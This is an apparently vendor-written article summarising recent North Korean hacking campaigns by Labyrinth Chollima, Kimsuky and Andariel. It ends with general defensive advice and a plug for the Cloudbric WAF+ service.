Cybersecurity Challenges and Countermeasures Against North Korean Hacking Attempts
The global significance of cybersecurity is escalating, with the National Intelligence Service of South Korea (NIS) reporting an alarming average of 1.5 million daily cyberattacks from North Korea. This heightened threat extends beyond the public sector to encompass critical areas such as defense, diplomatic institutions, and expert networks, impacting portal sites and cloud services used by private companies.
In response to North Korea’s evolving cyber threats, effective countermeasures are imperative.
In contrast to past practices of discreetly conducting covert cyber operations, North Korean hacking entities have recently intensified their attacks. Traditionally, their focus was on targeting confidential information or launching Distributed Denial of Service (DDoS) attacks. However, in recent years, there has been a discernible shift towards a broader spectrum of activities, encompassing ransomware attacks, weapon information gathering, and cryptocurrency-related exploits. This shift indicates a move towards a more indiscriminate targeting strategy.
Significantly, North Korean hacking groups are not only engaging in the exchange and collaboration of essential hacking tools and malware, but they are also showcasing adaptability to various computer operating systems, including Linux and MacOS. This adaptability enables them to diversify their targets and increase the sophistication of their cyber campaigns.
Now, let’s delve into specific instances of recent cyberattacks attributed to North Korea.
Recent Cyber Attack Cases
Case #1 North Korean hackers breached a US tech company to steal crypto
In June 2023, Labyrinth Chollima, one of North Korea’s most prolific hacking group and a North Korean government-backed, penetrated an American IT management company and used it as a springboard to target cryptocurrency companies.
Chainalysis, a Blockchain analytics firm, said last year that North Korean-linked groups stole an estimated $1.7billion worth of digital cash across multiple hacks.
North Korea has previously denied organizing digital currency heists, despite voluminous evidence – including U.N reports – to the contrary.
This hack, identified by CrowdStrick, was a supply chain attack that can give them broader access to multiple victims downstream.
Case #2 Phishing Attack Targeting 1,400 Individuals
North Korea’s hacking group, known as “Kimsuki,” has persisted in conducting phishing attacks through replica portal sites and malware. In this instance, Kimsuki deployed a large-scale phishing email campaign, posing as government agencies, media reporters, and research institutes. The emails were crafted to appear enticing by containing information relevant to the recipient’s interests, such as national health insurance notices, interview questions, forum presentation materials, and national tax payment guidelines.
Upon opening the attached files, users unwittingly installed malicious programs that compromised information within their personal computers. Furthermore, account information was pilfered through phishing sites masquerading as popular online portals like Naver, Daum, and Google.
The phishing email orchestrated by Kimsuki resulted in a total of 1,468 victims. Among them, 1,411 were ordinary individuals, including office workers and self-employed professionals, while 57 were incumbent public officials in the ministry of unification and diplomacy, including former ministerial-level officials. Despite Kimsuki’s attempt to access diplomatic and security information, it was reported that they did not successfully breach security data.
Law enforcement agencies revealed that the expansion of Kimsuki’s hacking targets and the evolution of their methods are linked to a growing interest in virtual assets. Hackers attempted to pilfer cryptocurrency coins of phishing email victims by illicitly accessing exchange accounts, but these efforts were thwarted by enhanced security measures. Additionally, it was discovered that a virtual asset mining program was surreptitiously executed on a hacking-controlled stop-over server.
Case #3 Hacking Domestic Asset Management Program
Recent findings have uncovered the utilization of an asset management program by the North Korean hacking group Andariel for the distribution of malicious codes. The discovery was made through the verification of logs indicating the installation of Andariel’s malicious code within a specific asset management program in Korea.
It remains unclear whether the attack exploited a vulnerability or involved simple abuse. However, the investigation has determined that the asset management program running on the targeted system initiated the download of the malicious code ‘*TigerRat’ using a PowerShell command.
<*TigerRat is identified as a backdoor malicious code equipped with diverse functionalities, including the ability to upload and download files, execute commands, collect basic information, perform keylogging, capture screens, and facilitate port forwarding.>
North Korean Cyber Attack Trend
The active hacking groups Kimsuky and Andariel, operating within South Korea, initially focused on stealing security-related information. However, their objectives have evolved over time, now encompassing attacks for financial gain.
In 2022, North Korean hacking groups have exhibited a strategic shift, redirecting their focus towards targeting security authentication software installed on individual PCs. This represents a departure from their previous emphasis on direct hacks into the computer networks of public institutions. The objective of compromising this software is to potentially gain control over more than 10 million PCs simultaneously.
Moreover, they have expanded their tactics to include attacks on security products delivered to institutions and infiltrating the internal networks of major national agencies.
During the initial stages of infiltration, North Korean hacking groups have demonstrated a preference for utilizing *spear phishing attacks, *watering hole attacks, and exploiting software vulnerabilities. These methods serve as entry points for their cyber campaigns, and as the attacks progress, additional vulnerabilities are exploited to facilitate the distribution of malware.
<*Spear phishing attack is a targeted form of phishing, aimed at extracting information about specific individuals, in contrast to traditional phishing, which typically involves a large volume of unspecified personal information.
*A watering hole attack is a tactic that entails infecting frequently visited websites and embedding malicious code to compromise the devices of all users accessing the compromised webpage.>
North Korea’s cyberattacks are expected to intensify ahead of the April 2024 general elections, so thorough preparation is needed according to the individual, institutional, and business environment.
For individual users:
Exercise caution with email attachments, update account information regularly, and enhance security settings with two-factor authentication, one-time passwords (OTP), and consider blocking overseas IP connections.
For corporate security experts:
Proactively monitor asset management programs, address vulnerabilities promptly, and develop/upkeep comprehensive security policies for programs, including OS and browsers.
For institutions or businesses facing challenges in securing dedicated security professionals, leveraging managed security solutions provided by experts, such as Cloudbric WAF+, can be a prudent approach. Cloudbric WAF+ is a comprehensive, fully managed cloud Security-as-a-Service(SaaS) platform that delivers cloud-based managed web application and API security services.
In preparation for the increasingly sophisticated threat of cyberattacks from North Korea, it is essential to observe various types of hacking cases. Furthermore, establishing a security policy and response system tailored to the specific needs of the institution or business environment becomes imperative.